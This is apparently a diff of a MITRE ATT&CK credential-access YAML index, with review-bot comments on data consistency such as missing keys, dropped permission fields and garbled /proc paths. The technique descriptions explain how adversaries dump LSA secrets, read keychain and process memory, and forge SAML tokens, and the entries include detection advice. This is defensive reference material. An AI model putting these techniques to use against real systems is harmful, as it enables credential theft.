@@ -44006,10 +44664,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -44017,14 +44676,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -44067,14 +44726,11 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests: []
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -44129,14 +44785,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -44187,14 +44842,13 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests: []
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -44228,8 +44882,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -44246,11 +44900,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
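Review bot: T1555.002 has no `identifier:` line between `x_mitre_modified_by_ref` and `atomic_tests: []`, whereas the neighbouring entries T1539, T1003.002 and T1552.005 each carry `identifier: <id>` at that position. The omission predates this patch, but since the generator is already rewriting these objects it should emit the key consistently (or drop it everywhere) so consumers can rely on one shape.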
@@ -44268,7 +44921,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -44285,10 +44938,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -44312,46 +44965,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
@@ -44372,65 +44991,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
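Review bot: in the T1003.004 description the registry path `HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets` ends a line and the sentence's closing period starts the next one, which looks like inline-code markup around the path was stripped when the text was synced. Check that the source YAML keeps one inline-code convention (the other descriptions in this file use backticks) so the rendered sentence reads as one unit.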
@@ -44439,6 +45055,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44446,31 +45065,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
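Review bot: `x_mitre_permissions_required: [SYSTEM]` is removed from T1003.004 with no replacement, and the same field is dropped for T1555.005 (`User`) and T1556.002 (`Administrator`, `SYSTEM`) further down. The description still states "Adversaries with SYSTEM access", so the information survives in prose, but if the field was retired upstream that should be stated in the commit message; if not, this is a data loss. Separately, the re-added Tilbury reference keeps the stray leading digit in `1Windows Credentials: Attack, Mitigation, Defense`; since the entry is being rewritten anyway, this is the moment to correct it (or to fix it upstream if the text is synced verbatim).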
@@ -44483,14 +45134,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -44531,14 +45182,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
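Review bot: the T1003.007 description reads `/proc//maps` and `/proc//mem`, which have lost the PID placeholder between the slashes (almost certainly an angle-bracketed `<PID>` removed as if it were HTML); verify the source text and re-sync so the paths are meaningful. The citation key `Picus Labs Proc cump 2022` also carries a typo, but it is a `source_name` that must match its `external_references` entry, so change both or neither.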
@@ -44601,81 +45249,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
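Review bot: for T1555.005 the `x_mitre_version` moves from `1.0` to `1.1` and `modified` is refreshed, yet the description and detection text are removed and re-added byte-for-byte and the references are only reordered; the only substantive change in the object is the dropped `x_mitre_permissions_required: [User]`. Confirm the version bump mirrors upstream rather than being an artifact of regeneration, since a reorder alone should not advance the technique version.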
@@ -44760,12 +45406,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44814,38 +45459,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -44869,76 +45489,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
